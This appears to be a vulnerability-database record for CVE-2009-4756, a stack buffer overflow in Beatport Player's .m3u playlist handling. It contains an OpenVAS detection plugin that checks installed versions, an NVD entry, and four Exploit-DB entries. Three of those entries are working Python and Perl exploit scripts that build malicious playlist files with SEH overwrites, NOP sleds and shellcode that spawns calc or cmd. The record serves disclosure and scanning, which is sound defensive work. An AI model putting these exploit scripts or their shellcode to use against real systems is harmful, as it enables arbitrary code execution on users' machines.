Beatport Player '.m3u' File Buffer Overflow Vulnerability
2010-04-07T00:00:00
ID OPENVAS:800749 Type openvas Reporter Copyright (C) 2010 Greenbone Networks GmbH Modified 2017-02-20T00:00:00
Description
This host is installed with Beatport Player and is prone to
buffer overflow vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_beatport_player_bof_vuln.nasl 5368 2017-02-20 14:34:16Z cfi $
#
# Beatport Player '.m3u' File Buffer Overflow Vulnerability
#
# Authors:
# Madhuri D <dmadhuri@secpod.com>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allow attacker to execute
arbitrary code on the system or cause the application to crash.
Impact Level: Application";
tag_affected = "Beatport Player version 1.0.0.283 and prior.";
tag_insight = "The flaw is due to improper bounds ckecking when opening
specially crafted '.M3U' file.";
tag_solution = "No solution or patch was made available for at least one year
since disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.";
tag_summary = "This host is installed with Beatport Player and is prone to
buffer overflow vulnerability.";
if(description)
{
script_id(800749);
script_version("$Revision: 5368 $");
script_tag(name:"last_modification", value:"$Date: 2017-02-20 15:34:16 +0100 (Mon, 20 Feb 2017) $");
script_tag(name:"creation_date", value:"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)");
script_cve_id("CVE-2009-4756");
script_bugtraq_id(34793);
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_name("Beatport Player '.m3u' File Buffer Overflow Vulnerability");
script_xref(name : "URL" , value : "http://www.milw0rm.com/exploits/8592");
script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/50267");
script_tag(name:"qod_type", value:"executable_version");
script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
script_category(ACT_GATHER_INFO);
script_family("Buffer overflow");
script_dependencies("secpod_reg_enum.nasl");
script_mandatory_keys("SMB/WindowsVersion");
script_require_ports(139, 445);
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("smb_nt.inc");
include("version_func.inc");
include("secpod_smb_func.inc");
if(!get_kb_item("SMB/WindowsVersion")){
exit(0);
}
if(!registry_key_exists(key:"SOFTWARE\Native Instruments\TraktorBeatport")){
exit(0);
}
tbpName = registry_get_sz(key:"SOFTWARE\Microsoft\Windows\CurrentVersion" +
"\Uninstall\Native Instruments Traktor Beatport Player",
item:"DisplayName");
if("Native Instruments Traktor Beatport Player" >< tbpName)
{
path = registry_get_sz(key:"SOFTWARE\Microsoft\Windows\CurrentVersion",
item:"CommonFilesDir");
if(isnull(path)){
exit(0);
}
path = path - "\Common Files" + "\Native Instruments\Traktor Beatport Player" +
"\TraktorBeatport.exe";
share = ereg_replace(pattern:"([A-Za-z]):.*", replace:"\1$", string:path);
file = ereg_replace(pattern:"[A-Za-z]:(.*)", replace:"\1", string:path);
ver = GetVer(file:file, share:share);
if(ver != NULL)
{
if(version_is_less_equal(version:ver, test_version:"1.0.0.283")){
security_message(0);
}
}
}
{"id": "OPENVAS:800749", "type": "openvas", "bulletinFamily": "scanner", "title": "Beatport Player '.m3u' File Buffer Overflow Vulnerability", "description": "This host is installed with Beatport Player and is prone to\nbuffer overflow vulnerability.", "published": "2010-04-07T00:00:00", "modified": "2017-02-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=800749", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.milw0rm.com/exploits/8592", "http://xforce.iss.net/xforce/xfdb/50267"], "cvelist": ["CVE-2009-4756"], "lastseen": "2017-07-02T21:09:59", "viewCount": 3, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2017-07-02T21:09:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4756"]}, {"type": "exploitdb", "idList": ["EDB-ID:8591", "EDB-ID:8590", "EDB-ID:8592", "EDB-ID:8588"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800749"]}], "modified": "2017-07-02T21:09:59", "rev": 2}, "vulnersScore": 8.2}, "pluginID": "800749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_beatport_player_bof_vuln.nasl 5368 2017-02-20 14:34:16Z cfi $\n#\n# Beatport Player '.m3u' File Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute\narbitrary code on the system or cause the application to crash.\n\nImpact Level: Application\";\n\ntag_affected = \"Beatport Player version 1.0.0.283 and prior.\";\n\ntag_insight = \"The flaw is due to improper bounds ckecking when opening\nspecially crafted '.M3U' file.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\"; \n\ntag_summary = \"This host is installed with Beatport Player and is prone to\nbuffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(800749);\n script_version(\"$Revision: 5368 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:34:16 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)\");\n script_cve_id(\"CVE-2009-4756\");\n script_bugtraq_id(34793);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Beatport Player '.m3u' File Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8592\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/50267\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Native Instruments\\TraktorBeatport\")){\n exit(0);\n}\n\ntbpName = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Native Instruments Traktor Beatport Player\",\n item:\"DisplayName\");\n\nif(\"Native Instruments Traktor Beatport Player\" >< tbpName)\n{\n path = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(isnull(path)){\n exit(0);\n }\n\n path = path - \"\\Common Files\" + \"\\Native Instruments\\Traktor Beatport Player\" +\n \"\\TraktorBeatport.exe\";\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path);\n\n ver = GetVer(file:file, share:share);\n if(ver != NULL)\n {\n if(version_is_less_equal(version:ver, test_version:\"1.0.0.283\")){\n security_message(0);\n }\n }\n}\n", "naslFamily": "Buffer overflow"}
{"cve": [{"lastseen": "2020-10-03T11:54:20", "description": "Stack-based buffer overflow in TraktorBeatport.exe 1.0.0.283 in Beatport Player 1.0.0.0 allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file.", "edition": 3, "cvss3": {}, "published": "2010-03-29T18:30:00", "title": "CVE-2009-4756", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4756"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:beatport:beatport_player:1.0.0.0"], "id": "CVE-2009-4756", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:beatport:beatport_player:1.0.0.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4756"], "description": "This host is installed with Beatport Player and is prone to\nbuffer overflow vulnerability.", "modified": "2018-11-30T00:00:00", "published": "2010-04-07T00:00:00", "id": "OPENVAS:1361412562310800749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800749", "type": "openvas", "title": "Beatport Player '.m3u' File Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_beatport_player_bof_vuln.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# Beatport Player '.m3u' File Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800749\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-07 16:20:50 +0200 (Wed, 07 Apr 2010)\");\n script_cve_id(\"CVE-2009-4756\");\n script_bugtraq_id(34793);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Beatport Player '.m3u' File Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8592\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/50267\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute\narbitrary code on the system or cause the application to crash.\");\n script_tag(name:\"affected\", value:\"Beatport Player version 1.0.0.283 and prior.\");\n script_tag(name:\"insight\", value:\"The flaw is due to improper bounds ckecking when opening\nspecially crafted '.M3U' file.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"summary\", value:\"This host is installed with Beatport Player and is prone to\nbuffer overflow vulnerability.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Native Instruments\\TraktorBeatport\")){\n exit(0);\n}\n\ntbpName = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Native Instruments Traktor Beatport Player\",\n item:\"DisplayName\");\n\nif(\"Native Instruments Traktor Beatport Player\" >< tbpName)\n{\n path = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(isnull(path)){\n exit(0);\n }\n\n path = path - \"\\Common Files\" + \"\\Native Instruments\\Traktor Beatport Player\" +\n \"\\TraktorBeatport.exe\";\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path);\n\n ver = GetVer(file:file, share:share);\n if(ver != NULL)\n {\n if(version_is_less_equal(version:ver, test_version:\"1.0.0.283\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T07:42:21", "description": "Beatport Player 1.0.0.283 (.M3U File) Local Buffer Overflow PoC. CVE-2009-4756. Dos exploit for windows platform", "published": "2009-05-01T00:00:00", "type": "exploitdb", "title": "Beatport Player 1.0.0.283 - .M3U Local Buffer Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4756"], "modified": "2009-05-01T00:00:00", "id": "EDB-ID:8588", "href": "https://www.exploit-db.com/exploits/8588/", "sourceData": "#####################################################################################################\r\n# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC\r\n# Discovered by SirGod - www.mortal-team.net\r\n# Error log :\r\n#\r\n# Logged at Friday, May 01, 2009 14:03:17\r\n# FileVersion: 1.0.0.283\r\n# ProductVersion: 1.0.0.0\r\n# Exception Code: 0xC0000005\r\n# Exception Addr: 0x001B:0x004317F0\r\n# Exception Module: TraktorBeatport.exe\r\n# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC\r\n# The memory could not be \"read\"\r\n#\t http://www.brothersoft.com/beatport-player-download-62319.html \r\n######################################################################################################\r\nmy $chars= \"A\" x 1337;\r\nmy $file=\"sirgod.m3u\";\r\nopen(my $FILE, \">>$file\") or die \"Cannot open $file: $!\";\r\nprint $FILE $chars;\r\nclose($FILE);\r\nprint \"$file was created\";\r\n\r\n# milw0rm.com [2009-05-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8588/"}, {"lastseen": "2016-02-01T07:42:39", "description": "Beatport Player 1.0.0.283 (.m3u) Local SEH Overwrite Exploit. CVE-2009-4756. Local exploit for windows platform", "published": "2009-05-01T00:00:00", "type": "exploitdb", "title": "Beatport Player 1.0.0.283 - .m3u Local SEH Overwrite Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4756"], "modified": "2009-05-01T00:00:00", "id": "EDB-ID:8590", "href": "https://www.exploit-db.com/exploits/8590/", "sourceData": "#usage: exploit.py\r\n# Grab the exploit file into the program\r\nprint \"**************************************************************************\"\r\nprint \" Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\\n\"\r\nprint \" Refer: http://www.milw0rm.com/exploits/8588\\n\"\r\nprint \" Exploit code: His0k4\\n\"\r\nprint \" Tested on: Windows XP Pro SP3 (EN)\\n\"\r\nprint \" greetz: TO ELITE ALGERIANS,snakespc.com\\n\"\r\nprint \"**************************************************************************\"\r\n \t\r\n\t\t\t\r\nbuff = \"\\x41\" * 1232\r\nnext_seh = \"\\xEB\\x06\\x90\\x90\"\r\nseh = \"\\xB8\\x15\\xD1\\x72\" #msacm32.drv\r\n\r\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\r\nshellcode = (\r\n\"\\x29\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe8\"\r\n\"\\x61\\xfb\\x36\\x83\\xeb\\xfc\\xe2\\xf4\\x14\\x89\\xbf\\x36\\xe8\\x61\\x70\\x73\"\r\n\"\\xd4\\xea\\x87\\x33\\x90\\x60\\x14\\xbd\\xa7\\x79\\x70\\x69\\xc8\\x60\\x10\\x7f\"\r\n\"\\x63\\x55\\x70\\x37\\x06\\x50\\x3b\\xaf\\x44\\xe5\\x3b\\x42\\xef\\xa0\\x31\\x3b\"\r\n\"\\xe9\\xa3\\x10\\xc2\\xd3\\x35\\xdf\\x32\\x9d\\x84\\x70\\x69\\xcc\\x60\\x10\\x50\"\r\n\"\\x63\\x6d\\xb0\\xbd\\xb7\\x7d\\xfa\\xdd\\x63\\x7d\\x70\\x37\\x03\\xe8\\xa7\\x12\"\r\n\"\\xec\\xa2\\xca\\xf6\\x8c\\xea\\xbb\\x06\\x6d\\xa1\\x83\\x3a\\x63\\x21\\xf7\\xbd\"\r\n\"\\x98\\x7d\\x56\\xbd\\x80\\x69\\x10\\x3f\\x63\\xe1\\x4b\\x36\\xe8\\x61\\x70\\x5e\"\r\n\"\\xd4\\x3e\\xca\\xc0\\x88\\x37\\x72\\xce\\x6b\\xa1\\x80\\x66\\x80\\x91\\x71\\x32\"\r\n\"\\xb7\\x09\\x63\\xc8\\x62\\x6f\\xac\\xc9\\x0f\\x02\\x9a\\x5a\\x8b\\x61\\xfb\\x36\")\r\n\r\nexploit = buff + next_seh + seh + shellcode\r\n\r\ntry:\r\n out_file = open(\"exploit.m3u\",'w')\r\n out_file.write(exploit)\r\n out_file.close()\r\n raw_input(\"\\nExploit file created!\\n\")\r\nexcept:\r\n print \"Error\"\r\n\r\n# milw0rm.com [2009-05-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8590/"}, {"lastseen": "2016-02-01T07:42:48", "description": "Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #2. CVE-2009-4756. Local exploit for windows platform", "published": "2009-05-01T00:00:00", "type": "exploitdb", "title": "Beatport Player 1.0.0.283 - .M3U Local Stack Overflow Exploit 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4756"], "modified": "2009-05-01T00:00:00", "id": "EDB-ID:8591", "href": "https://www.exploit-db.com/exploits/8591/", "sourceData": "#exploit.py\r\n#\r\n# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit\r\n# By: Encrypt3d.M!nd\r\n#\r\n# Tested on : Windows xp sp2\r\n#\r\n\r\nchars = \"\\x41\" * 1232\r\n\r\nns = \"\\xEB\\x06\\x90\\x90\"\r\nsh = \"\\x35\\x2F\\xD1\\x72\"\r\n\r\nnops = \"\\x90\" * 20\r\n\r\n# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351\r\nEncoder=PexAlphaNum http://metasploit.com\r\n\r\nshellcode=(\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"\r\n\"\\x42\\x30\\x42\\x30\\x42\\x50\\x4b\\x48\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x35\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x34\\x4b\\x48\\x46\\x33\\x4b\\x38\"\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\n\"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x37\\x45\\x4e\\x4b\\x58\"\r\n\"\\x4f\\x55\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\\x4e\\x50\\x4b\\x44\"\r\n\"\\x4b\\x38\\x4f\\x35\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x48\\x4e\\x51\\x4b\\x38\"\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x58\\x4e\\x55\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x33\"\r\n\"\\x42\\x4c\\x46\\x36\\x4b\\x48\\x42\\x44\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x47\"\r\n\"\\x4e\\x50\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x38\\x42\\x37\\x4e\\x41\\x4d\\x4a\"\r\n\"\\x4b\\x38\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x38\\x42\\x4b\"\r\n\"\\x42\\x30\\x42\\x30\\x42\\x30\\x4b\\x58\\x4a\\x56\\x4e\\x33\\x4f\\x35\\x41\\x53\"\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x55\\x49\\x58\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\"\r\n\"\\x42\\x35\\x4a\\x56\\x4f\\x4e\\x50\\x4c\\x42\\x4e\\x42\\x56\\x4a\\x46\\x4a\\x39\"\r\n\"\\x50\\x4f\\x4c\\x58\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x36\"\r\n\"\\x4e\\x56\\x43\\x36\\x50\\x32\\x45\\x36\\x4a\\x37\\x45\\x56\\x42\\x50\\x5a\")\r\n\r\n\r\n\r\nfile=open('Devil_inside.m3u','w')\r\nfile.write(chars+ns+sh+nops+shellcode)\r\nfile.close()\r\n\r\n# milw0rm.com [2009-05-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8591/"}, {"lastseen": "2016-02-01T07:42:55", "description": "Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit #3. CVE-2009-4756. Local exploit for windows platform", "published": "2009-05-01T00:00:00", "type": "exploitdb", "title": "Beatport Player 1.0.0.283 - .M3U Local Stack Overflow Exploit 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4756"], "modified": "2009-05-01T00:00:00", "id": "EDB-ID:8592", "href": "https://www.exploit-db.com/exploits/8592/", "sourceData": " #!/usr/bin/perl\r\n# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)\r\n# Work Only in WIN SP2 FR\r\n# Credit to SirGod The Discover\r\n# Stack The exploiter\r\n# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d\r\n# After exec the exploit wait some sec for see the cmd executed :d\r\nuse strict;\r\nuse warnings;\r\n# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078\r\nmy $shellcode =\r\n\"\\x8B\\xEC\\x33\\xFF\\x57\".\r\n\"\\xC6\\x45\\xFC\\x63\\xC6\\x45\".\r\n\"\\xFD\\x6D\\xC6\\x45\\xFE\\x64\".\r\n\"\\xC6\\x45\\xF8\\x01\\x8D\".\r\n\"\\x45\\xFC\\x50\\xB8\\xC7\\x93\".\r\n\"\\xBF\\x77\\xFF\\xD0\";\r\nmy $junk = \"\\x41\" x 1232;\r\nmy $next_seh=\"\\xeb\\x06\\x90\\x90\";\r\nmy $seh = \"\\x44\\x25\\xD1\\x72\"; #\r\nmy $nops = \"\\x90\" x 4;\r\nmy $nopsled = \"\\x90\" x 20;\r\nopen(my $playlist, \"> seh_exploit.m3u\");\r\nprint $playlist\r\n $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.\r\n \"\\r\\n\";\r\nclose $playlist;\r\n\r\n# milw0rm.com [2009-05-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8592/"}]}